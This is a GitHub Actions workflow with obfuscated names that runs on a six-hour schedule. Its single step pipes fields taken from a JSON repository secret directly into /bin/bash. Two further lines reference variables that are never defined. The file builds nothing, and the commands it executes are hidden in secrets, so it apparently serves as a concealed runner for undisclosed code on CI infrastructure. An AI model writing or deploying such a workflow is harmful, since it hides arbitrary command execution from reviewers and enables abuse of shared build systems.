name: fukanxxo

on:
  workflow_dispatch:
  schedule:
    - cron: '29 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fukanxxo
        env:
          semf4: ${{ secrets.semf4 }}
        run: |
          echo $semf4 | jq -r .zyygu4922 | /bin/bash
          echo $ezye334 | jq -r .ms1 | /bin/bash
          echo $dxny127 | jq -r .h484 | /bin/bash

